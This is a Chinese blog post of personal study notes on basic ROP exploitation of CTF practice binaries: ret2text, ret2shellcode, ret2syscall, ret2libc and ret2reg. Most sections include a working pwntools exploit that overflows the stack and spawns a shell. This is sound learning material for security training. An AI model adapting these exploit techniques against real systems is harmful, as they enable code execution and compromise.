<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>基本ROP | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="仅供个人学习参考">
<meta property="og:type" content="article">
<meta property="og:title" content="基本ROP">
<meta property="og:url" content="http://example.com/2024/03/19/%E5%9F%BA%E6%9C%ACROP/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="仅供个人学习参考">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://gateway.pinata.cloud/ipfs/bafkreidinxxhoal5le2ostrvnsk2e642q6igikurfyqknvipghipusys3e">
<meta property="og:image" content="https://gateway.pinata.cloud/ipfs/bafkreidgjsu6uimvkdto3w7llwdyq55cvztg7hds5nbkwtzpq6qakvrth4">
<meta property="og:image" content="https://gateway.pinata.cloud/ipfs/bafkreig6qvp33bybtjezfhlrbvwdhfnsdy5phercnxvsagclda6n4fhkfe">
<meta property="og:image" content="https://gateway.pinata.cloud/ipfs/bafkreih2w64dundco6wy4eltsf6eqlhc7dvwoziuiftnwe2wm2aaoss2vy">
<meta property="og:image" content="https://gateway.pinata.cloud/ipfs/bafkreiha54ne2p5u7vjd2f6tdnmty5marlcqv4uar3muz4nwlnxxo4a5oq">
<meta property="og:image" content="https://gateway.pinata.cloud/ipfs/bafkreihl4i3gaqkwx2z4spiu3lrtpx2btts3k7dhqzh7as5ymswb4krwue">
<meta property="og:image" content="https://gateway.pinata.cloud/ipfs/bafkreibbq5j2yegjl7gu4xxy4pcmg73w67ygpffvyd4b4ltg2yk73qh3wq">
<meta property="og:image" content="https://gateway.pinata.cloud/ipfs/bafkreifwgzhd46sjutyvoltbguv2cpvtktncqtgzxntar7owtio5jxvs4i">
<meta property="og:image" content="https://gateway.pinata.cloud/ipfs/bafybeifa62urkqgff7cxafghfy2kzm6r5ingclc2fx7ak4er2xo3qa7pye">
<meta property="og:image" content="https://gateway.pinata.cloud/ipfs/bafkreibogkbi32mz557a25yhsskj4dmze2pcn6gtm5u4abw6kofp5kcmja">
<meta property="og:image" content="https://gateway.pinata.cloud/ipfs/bafkreiguzbxmsejrmah7q66eyi74utjwdi7cwsj7gi7bwvecb2luhgfxue">
<meta property="og:image" content="https://gateway.pinata.cloud/ipfs/bafkreiag7xsvssereo2odwqt4citu5aayu6tyzhqk3sbtcjojwnpkhrtme">
<meta property="article:published_time" content="2024-03-19T12:52:40.000Z">
<meta property="article:modified_time" content="2024-04-08T12:30:50.075Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="ROP">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://gateway.pinata.cloud/ipfs/bafkreidinxxhoal5le2ostrvnsk2e642q6igikurfyqknvipghipusys3e">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-基本ROP" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2024/03/19/%E5%9F%BA%E6%9C%ACROP/" class="article-date">
  <time class="dt-published" datetime="2024-03-19T12:52:40.000Z" itemprop="datePublished">2024-03-19</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      基本ROP
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p><em>仅供个人学习参考</em>  </p>
<span id="more"></span>

<h2 id="ret2text"><a href="#ret2text" class="headerlink" title="ret2text"></a>ret2text</h2><p><em>有后门就是爽</em></p>
<p>&emsp;&emsp;先checksec一下<br><img src="https://gateway.pinata.cloud/ipfs/bafkreidinxxhoal5le2ostrvnsk2e642q6igikurfyqknvipghipusys3e" alt="checksec"><br>开启了nx保护和部分relro<br>用ida查看文件<br><img src="https://gateway.pinata.cloud/ipfs/bafkreidgjsu6uimvkdto3w7llwdyq55cvztg7hds5nbkwtzpq6qakvrth4" alt="ida"><br>明显有个栈溢出，且存在后门函数<br>&emsp;&emsp;基本思路：我们只需往变量s里填充垃圾数据，覆盖到ebp，再加入后门函数的地址，就可以获得shell。<br>exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">backdoor=<span class="number">0x0804863A</span></span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0xffffd148</span>-<span class="number">0xffffd0dc</span>+<span class="number">4</span>)+p32(backdoor)</span><br><span class="line">io=process(<span class="string">&quot;./ret2text&quot;</span>)</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>其中，多填充4字节的垃圾数据是为了覆盖ebp of previous stack frame，即父函数的栈帧的基指针（通常使用ebp寄存器来保存）</p>
<hr>
<p><em>补充：当一个函数被调用时，它会在栈上创建一个新的栈帧，用于存储函数的局部变量、参数和其他上下文信息。在创建新栈帧时，当前函数会将其<u>前一个栈帧的基指针值</u>保存在 ebp 寄存器中，以便后续操作可以访问前一个栈帧。</em><br><img src="https://gateway.pinata.cloud/ipfs/bafkreig6qvp33bybtjezfhlrbvwdhfnsdy5phercnxvsagclda6n4fhkfe" alt="函数调用栈示意图"></p>
<hr>
<h2 id="ret2shellcode"><a href="#ret2shellcode" class="headerlink" title="ret2shellcode"></a>ret2shellcode</h2><p><em>没有system（“&#x2F;bin&#x2F;sh”）就创造一个出来！！</em></p>
<p>查看文件<br><img src="https://gateway.pinata.cloud/ipfs/bafkreih2w64dundco6wy4eltsf6eqlhc7dvwoziuiftnwe2wm2aaoss2vy" alt="1"><br>发现有可读可写可执行段<br>打开ida<br><img src="https://gateway.pinata.cloud/ipfs/bafkreiha54ne2p5u7vjd2f6tdnmty5marlcqv4uar3muz4nwlnxxo4a5oq" alt="2"><br>&emsp;&emsp;有栈溢出，并且将s的数据拷贝到buf上，因为栈不可执行，所以我们可以把后门函数写入到buf上（buf位于.bss段），然后再通过栈溢出返回到buf，即可获得shell<br><em>emm似乎因为某些未知原因该题在我机子上显示.bss段不可执行，所以打不通，但是思路是没有问题的</em><br>exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">shellcode=asm(shellcraft.sh())</span><br><span class="line">buf2_addr=<span class="number">0x0804A080</span></span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0xffffd148</span>-<span class="number">0xffffd0dc</span>+<span class="number">4</span>)</span><br><span class="line">io=process(<span class="string">&quot;./ret2shellcode&quot;</span>)</span><br><span class="line">io.sendline(shellcode.ljust((<span class="number">0xffffd148</span>-<span class="number">0xffffd0dc</span>+<span class="number">4</span>),<span class="string">b&#x27;a&#x27;</span>)+p32(buf2_addr))</span><br><span class="line">io.interactive()</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>若文件是64位的，需要加个：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br></pre></td></tr></table></figure>

<h2 id="ret2syscall"><a href="#ret2syscall" class="headerlink" title="ret2syscall"></a>ret2syscall</h2><p><em>简单的一次代码碎片利用</em><br><em>“震惊！！小小碎片竟然能够……”</em></p>
<p>查看文件<br><img src="https://gateway.pinata.cloud/ipfs/bafkreihl4i3gaqkwx2z4spiu3lrtpx2btts3k7dhqzh7as5ymswb4krwue" alt="1"><br>开启了nx保护<br>再用ida看看<br><img src="https://gateway.pinata.cloud/ipfs/bafkreibbq5j2yegjl7gu4xxy4pcmg73w67ygpffvyd4b4ltg2yk73qh3wq" alt="2"><br>存在栈溢出，且有字符串“&#x2F;bin&#x2F;sh”，但是经过查找发现有可利用的代码片段，于是采用rop的思路，通过系统调用获取shell</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">execve(&quot;/bin/sh&quot;,NULL,NULL)</span><br></pre></td></tr></table></figure>
<p>利用这个系统调用，其系统调用号为<strong>0xb</strong>，elf的中断指令为<strong>int 0x80</strong><br>存放思路:<br>    eax  0xb<br>    ebx  binsh地址（0x080BE408）<br>    ecx 0<br>    edx 0<br>利用ROPgadget工具查找相应指令，如下：<br><img src="https://gateway.pinata.cloud/ipfs/bafkreifwgzhd46sjutyvoltbguv2cpvtktncqtgzxntar7owtio5jxvs4i" alt="ROPgadget"><br><img src="https://gateway.pinata.cloud/ipfs/bafybeifa62urkqgff7cxafghfy2kzm6r5ingclc2fx7ak4er2xo3qa7pye" alt="2"><br>找到俩能用的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">0x080bb196 : pop eax ; ret</span><br><span class="line">0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret</span><br></pre></td></tr></table></figure>
<p>exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">io = process(<span class="string">&#x27;./rop&#x27;</span>)</span><br><span class="line">pop_eax_ret = <span class="number">0x080bb196</span></span><br><span class="line">pop_edx_ecx_ebx_ret = <span class="number">0x0806eb90</span></span><br><span class="line">int_0x80 = <span class="number">0x08049421</span></span><br><span class="line">binsh = <span class="number">0x80be408</span></span><br><span class="line">payload = flat([<span class="string">&#x27;A&#x27;</span> * (<span class="number">0xffffd148</span>-<span class="number">0xffffd0dc</span>+<span class="number">4</span>), pop_eax_ret, <span class="number">0xb</span>, pop_edx_ecx_ebx_ret, <span class="number">0</span>, <span class="number">0</span>, binsh, int_0x80])</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="ret2libc1"><a href="#ret2libc1" class="headerlink" title="ret2libc1"></a>ret2libc1</h2><p><em>“system和&#x2F;bin&#x2F;sh分床了，这可怎么办？”</em></p>
<p>经典操作<br><img src="https://gateway.pinata.cloud/ipfs/bafkreibogkbi32mz557a25yhsskj4dmze2pcn6gtm5u4abw6kofp5kcmja" alt="1"><br><img src="https://gateway.pinata.cloud/ipfs/bafkreiguzbxmsejrmah7q66eyi74utjwdi7cwsj7gi7bwvecb2luhgfxue" alt="1"><br>开启了nx保护<br>有栈溢出，有&#x2F;bin&#x2F;sh，甚至还有system，但是此时system体内塞入了别的字符串<del>什么渣…</del><br>这时，我们就要用到plt表和got表了。<br>基本思路：利用栈溢出跳转到plt表中的system项，然后再通过其调用system函数，并传入参数”&#x2F;bin&#x2F;sh”，然后获得shell。<br>exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">io = process(<span class="string">&#x27;./ret2libc1&#x27;</span>)</span><br><span class="line">binsh_addr = <span class="number">0x8048720</span></span><br><span class="line">system_plt = <span class="number">0x08048460</span></span><br><span class="line">payload = flat([<span class="string">&#x27;a&#x27;</span> * (<span class="number">0xffffd148</span>-<span class="number">0xffffd0dc</span>+<span class="number">4</span>), system_plt, <span class="string">&#x27;aaaa&#x27;</span>, binsh_addr])</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
<p>其中填入aaaa是为了返回一个虚假地址（在栈上占个位置用的）</p>
<h2 id="ret2libc2"><a href="#ret2libc2" class="headerlink" title="ret2libc2"></a>ret2libc2</h2><p><em>“&#x2F;bin&#x2F;sh被气走了，这可怎么办？”</em></p>
<p>还是经典操作（图懒得给了，<del>切屏切到手酸</del>）</p>
<p>总之有栈溢出，有buf2在.bss段，有gets函数，可以手动构造一个&#x2F;bin&#x2F;sh，然后再调用system函数，跟ret2libc1差不多</p>
<p>exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">io = process(<span class="string">&#x27;./ret2libc2&#x27;</span>)</span><br><span class="line">gets_plt = <span class="number">0x08048460</span></span><br><span class="line">system_plt = <span class="number">0x08048490</span></span><br><span class="line">pop_ebx_ret = <span class="number">0x0804843d</span></span><br><span class="line">buf2 = <span class="number">0x804a080</span></span><br><span class="line">payload = flat([<span class="string">&#x27;a&#x27;</span> * (<span class="number">0xffffd148</span>-<span class="number">0xffffd0dc</span>+<span class="number">4</span>), gets_plt, pop_ebx_ret, buf2, system_plt, <span class="string">&#x27;aaaa&#x27;</span>, buf2])</span><br><span class="line">io.sendline(payload)</span><br><span class="line">io.sendline(<span class="string">&#x27;/bin/sh&#x27;</span>)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
<p>其中，pop_ebx_ret起到两个作用，一个是充当gets函数的返回地址，另一个是它本身功能：将buf2从栈上pop掉，然后返回到system_plt，维持栈平衡<br>当然这里还有另外一种写法，即</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload = flat([<span class="string">&#x27;a&#x27;</span> * (<span class="number">0xffffd148</span>-<span class="number">0xffffd0dc</span>+<span class="number">4</span>), gets_plt,system_plt, buf2, buf2])</span><br></pre></td></tr></table></figure>
<p>这样写，system_plt可以直接充当gets函数的返回地址，gets执行完毕后直接跳转到system_plt，然后先前栈上的buf2刚好充当system_plt的虚假返回地址（刚刚没有pop掉）</p>
<h2 id="ret2libc3"><a href="#ret2libc3" class="headerlink" title="ret2libc3"></a>ret2libc3</h2><p><em>“emmm没有sh也没有system，可利用的指令碎片也基本没有，这可真令人难受”</em></p>
<p>&emsp;&emsp;开启了nx保护，存在栈溢出，似乎没有别的东西了，怎么找到system函数地址呢？system函数属于libc，而libc.so 动态链接库中的函数之间相对偏移是固定的，那么只要得到libc中某个函数的地址，我们就可以得出system函数的地址<br>&emsp;&emsp;我们采用got表来泄露目标函数地址，由于libc的<strong>延迟绑定机制</strong>，我们需要泄漏已经执行过的函数的地址。本题我们泄露__libc_start_main函数的地址</p>
<p><del>emmmLibcSearcher这个工具不太好用，写这题的时候它并没有找到所需libc版本</del></p>
<p>这里推荐两个网站<br><a target="_blank" rel="noopener" href="https://libc.rip/">https://libc.rip/</a><br><a target="_blank" rel="noopener" href="https://libc.blukat.me/">https://libc.blukat.me/</a><br>这两个网站可以通过输入函数和对应地址末三位来查找当前使用的libc版本，并得到函数偏移量<br>如图<br><img src="https://gateway.pinata.cloud/ipfs/bafkreiag7xsvssereo2odwqt4citu5aayu6tyzhqk3sbtcjojwnpkhrtme" alt="0"><br>有时候查找出来的libc版本会比较多，建议多加几个函数进去（条件允许的话），然后一个个试<br>exp如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">&#x27;./ret2libc3&#x27;</span>)</span><br><span class="line"></span><br><span class="line">ret2libc3 = ELF(<span class="string">&#x27;./ret2libc3&#x27;</span>)</span><br><span class="line"></span><br><span class="line">puts_plt = ret2libc3.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">libc_start_main_got = ret2libc3.got[<span class="string">&#x27;__libc_start_main&#x27;</span>]</span><br><span class="line">main = ret2libc3.symbols[<span class="string">&#x27;main&#x27;</span>]</span><br><span class="line"></span><br><span class="line">payload = flat([<span class="string">b&#x27;A&#x27;</span> * <span class="number">112</span>, puts_plt, main, libc_start_main_got])<span class="comment">##泄露libc_start_main函数地址，并在泄露后回到main函数，即重新执行一遍程序</span></span><br><span class="line">sh.sendlineafter(<span class="string">&#x27;Can you find it !?&#x27;</span>, payload)</span><br><span class="line"></span><br><span class="line">libc_start_main_addr = u32(sh.recv()[<span class="number">0</span>:<span class="number">4</span>]) <span class="comment">##接收libc_start_main函数地址</span></span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc_start_main_addr)) <span class="comment">##打印出libc_start_main函数地址，为了人工判断libc版本，以便在之后填入各个函数的偏移（所以确乎是要与主机交互两遍）</span></span><br><span class="line">libc_start_main=<span class="number">0x021560</span> <span class="comment">##纯手打hhh</span></span><br><span class="line">system=<span class="number">0x047cb0</span></span><br><span class="line">binsh=<span class="number">0x1b90f5</span></span><br><span class="line">libcbase = libc_start_main_addr - libc_start_main</span><br><span class="line">system_addr = libcbase + system</span><br><span class="line">binsh_addr = libcbase + binsh</span><br><span class="line"></span><br><span class="line">payload = flat([<span class="string">b&#x27;A&#x27;</span> * <span class="number">104</span>, system_addr, <span class="number">0xdeadbeef</span>, binsh_addr])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="ret2reg"><a href="#ret2reg" class="headerlink" title="ret2reg"></a>ret2reg</h2><p>顾名思义，就是控制程序执行流返回到寄存器。首先需要知道执行ret时（栈溢出后）指向缓冲区空间的是哪个寄存器，其次往缓冲区写入shellcode，然后将call [寄存器] 或者jmp [寄存器]指令地址填入retaddress，利用栈溢出完成攻击<br>实现前提，该缓冲区是RWX的</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2024/03/19/%E5%9F%BA%E6%9C%ACROP/" data-id="clydtigr7000ccgbq9eu4f016" data-title="基本ROP" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ROP/" rel="tag">ROP</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2024/03/19/%E5%A0%86%E7%9B%B8%E5%85%B3/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          堆相关
        
      </div>
    </a>
  
  
    <a href="/2024/03/18/%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">动态链接相关</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/ROP/" rel="tag">ROP</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Tips/" rel="tag">Tips</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/VScode/" rel="tag">VScode</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/github/" rel="tag">github</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/hexo/" rel="tag">hexo</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/pwn/" rel="tag">pwn</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ubuntu/" rel="tag">ubuntu</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5/" rel="tag">动态链接</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%A0%86/" rel="tag">堆</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F-%E8%BF%9B%E7%A8%8B/" rel="tag">操作系统 进程</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/" rel="tag">格式化字符串漏洞</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%99%9A%E6%8B%9F%E5%86%85%E5%AD%98/" rel="tag">虚拟内存</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/ROP/" style="font-size: 20px;">ROP</a> <a href="/tags/Tips/" style="font-size: 10px;">Tips</a> <a href="/tags/VScode/" style="font-size: 10px;">VScode</a> <a href="/tags/github/" style="font-size: 10px;">github</a> <a href="/tags/hexo/" style="font-size: 10px;">hexo</a> <a href="/tags/pwn/" style="font-size: 10px;">pwn</a> <a href="/tags/ubuntu/" style="font-size: 20px;">ubuntu</a> <a href="/tags/%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5/" style="font-size: 20px;">动态链接</a> <a href="/tags/%E5%A0%86/" style="font-size: 10px;">堆</a> <a href="/tags/%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F-%E8%BF%9B%E7%A8%8B/" style="font-size: 10px;">操作系统 进程</a> <a href="/tags/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/" style="font-size: 10px;">格式化字符串漏洞</a> <a href="/tags/%E8%99%9A%E6%8B%9F%E5%86%85%E5%AD%98/" style="font-size: 10px;">虚拟内存</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/05/">May 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/04/">April 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/03/">March 2024</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2024/05/20/%E6%A0%88%E8%BF%81%E7%A7%BB/">(no title)</a>
          </li>
        
          <li>
            <a href="/2024/04/16/VScode%E8%BF%9C%E7%A8%8B%E8%BF%9E%E6%8E%A5%E8%99%9A%E6%8B%9F%E6%9C%BA%E4%BB%A5%E5%8F%8A%E5%85%8D%E5%AF%86%E7%99%BB%E5%BD%95/">VScode远程连接虚拟机以及免密登录</a>
          </li>
        
          <li>
            <a href="/2024/04/15/pwn-environment/">pwn-environment</a>
          </li>
        
          <li>
            <a href="/2024/04/02/%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E2%80%94%E2%80%94%E8%BF%9B%E7%A8%8B/">操作系统——进程</a>
          </li>
        
          <li>
            <a href="/2024/04/01/hexo%E6%8E%A8%E9%80%81%E6%96%87%E7%AB%A0%E5%A4%B1%E8%B4%A5%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88/">hexo推送文章失败解决方案</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2024 John Doe<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    


<script src="/js/jquery-3.6.4.min.js"></script>



  
<script src="/fancybox/jquery.fancybox.min.js"></script>




<script src="/js/script.js"></script>





  </div>
</body>
</html>